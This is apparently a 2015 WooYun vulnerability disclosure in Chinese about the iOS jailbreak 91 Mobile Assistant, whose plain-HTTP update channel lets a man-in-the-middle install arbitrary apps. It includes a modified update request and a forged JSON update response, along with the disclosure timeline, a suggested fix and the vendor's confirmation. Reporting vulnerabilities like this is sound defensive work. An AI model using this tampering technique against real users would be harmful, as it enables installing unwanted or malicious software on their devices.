当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0125417

漏洞标题:91手机助手IOS越狱版全版本漏洞可受中间人攻击下载且安装任意APP(或影响八千万用户)

相关厂商:福建网龙

漏洞作者: 高小厨

提交时间:2015-07-08 16:34

修复时间:2015-08-23 11:20

公开时间:2015-08-23 11:20

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-08: 细节已通知厂商并且等待厂商处理中
2015-07-09: 厂商已经确认,细节仅向厂商公开
2015-07-19: 细节向核心白帽子及相关领域专家公开
2015-07-29: 细节向普通白帽子公开
2015-08-08: 细节向实习白帽子公开
2015-08-23: 细节向公众公开

简要描述:

从没人发过ios这类的,给个精华可好?

详细说明:

1、目标:91手机助手IOS越狱版
2、用户量:貌似越狱的都会安装91手机助应用或者PP助手,因为使用它可以下载免费APP,据官方自己统计下载量达8000万(虽然也有非越狱手机安装91助手,但毕竟是少数)

用户量.png


3、测试过3.6.7版本到5.0.5版本,确定其为全版本漏洞
4、打开91手机助手,多次拦截返回数据包,并观察返回数据包,重点监视域名为http://sjupdate.sj.91.com的数据包
(1)低版本的被动发起更新(这里我们只需将更新的返回包修改一下就好,这里我们在更新时安装优酷的APP)
返回数据包为:

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 4.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 08 Jul 2015 08:17:04 GMT
Content-Length: 580
{"Code":0,"Result":{"updateAtOnce":"0","fileUrl":"http://bcs.91.com/rbreszy/iphone/soft/2015/7/8/a6b9762e03134db881733ea338430ccd/com.youku.YouKu_4.6_20150706_635719609477538660.ipa","size":"","versionName":"5.0.5","versionCode":"","iconUrl":"","updateContent":"1. 全新的91助手,一切都是新的\r\n2. 全新的划算栏目,土豪付费我免费\r\n3. 游戏礼包随便领,新游精品任你玩\r\n4. 工具优化右上角,关机重启连电脑\r\n5. 彻底的性能优化和问题修复。","updateTime":"2015-06-26 13:48"}}


91助手被动发起.png

91助手2.png


(2)高版本通过触发点击更新时安装任意APP

91助手点击更新发起.png


(3)任意版本91手机助手每次启动时强制推送更新信息,使其安装任意APP
首先打开91手机助手,拦截发送出去的数据包,并将发送给域名为http://sjupdate.sj.91.com的数据包进行修改,改后的值为

GET http://sjupdate.sj.91.com/user.ashx?chl=jZg3GleBqu%2Fa2oWvpfPBLecjfojj9X%2BH&nt=10&versionName=5.0.5&osv=7.0.4&versionType=ipa&imei=6d8790a886e6a1edd8699f125c4954f86b39e4c5&dm=iPhone4,1&sv=5.0.5&act=5&productId=2&cuid=15c7c7af83f37a6d38a8d6169b23130716b3035d&pid=2&mt=1 HTTP/1.1
Host: sjupdate.sj.91.com
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: zh-cn
Connection: keep-alive
User-Agent: NetDragon.Mobile.iPhone.91Space


这里我们只要将versionName的值修改为当前最新版本以下的任何一个版本号就可以,此时将返回更新数据包,我们将更新的数据包改为如下,即可更新时就安装优酷APP

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 4.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 08 Jul 2015 08:17:04 GMT
Content-Length: 580
{"Code":0,"Result":{"updateAtOnce":"0","fileUrl":"http://bcs.91.com/rbreszy/iphone/soft/2015/7/8/a6b9762e03134db881733ea338430ccd/com.youku.YouKu_4.6_20150706_635719609477538660.ipa","size":"","versionName":"5.0.5","versionCode":"","iconUrl":"","updateContent":"1. 全新的91助手,一切都是新的\r\n2. 全新的划算栏目,土豪付费我免费\r\n3. 游戏礼包随便领,新游精品任你玩\r\n4. 工具优化右上角,关机重启连电脑\r\n5. 彻底的性能优化和问题修复。","updateTime":"2015-06-26 13:48"}}


91助手自动发起.png

漏洞证明:

效果演示:

91助手4.png

修复方案:

返回包校验

版权声明:转载请注明来源 高小厨@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-07-09 11:19

厂商回复:

感谢 高小厨 提交的漏洞,已安排进行处理

最新状态:

暂无


漏洞评价:

评论

  1. 2015-07-08 16:47 | 浩天 认证白帽子 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

    看看白帽子:内谁

  2. 2015-07-08 16:50 | 高小厨 ( 普通白帽子 | Rank:814 漏洞数:74 | 不会吹牛的小二不是好厨子!)

    @浩天 看过来,看过来,厨子给各位做点好吃的

  3. 2015-07-08 17:21 | 牛 小 帅 ( 普通白帽子 | Rank:363 漏洞数:84 | [code]心若没有栖息的地方,走到哪里都是在...)

    @浩天 来条闪电 顺便帮我审核一下漏洞 还有3个没审核

  4. 2015-07-08 17:30 | Looke ( 普通白帽子 | Rank:619 漏洞数:93 | 可顺势而为,何必逆水行舟)

    屌屌的,前排

  5. 2015-07-08 17:37 | 牛 小 帅 ( 普通白帽子 | Rank:363 漏洞数:84 | [code]心若没有栖息的地方,走到哪里都是在...)

    @Looke 你的p2p好多没认领

  6. 2015-07-08 17:39 | Looke ( 普通白帽子 | Rank:619 漏洞数:93 | 可顺势而为,何必逆水行舟)

    @牛 小 帅,是啊,估计都破产了

  7. 2015-07-08 17:42 | 牛 小 帅 ( 普通白帽子 | Rank:363 漏洞数:84 | [code]心若没有栖息的地方,走到哪里都是在...)

    @Looke 哈哈 说的人家厂商要哭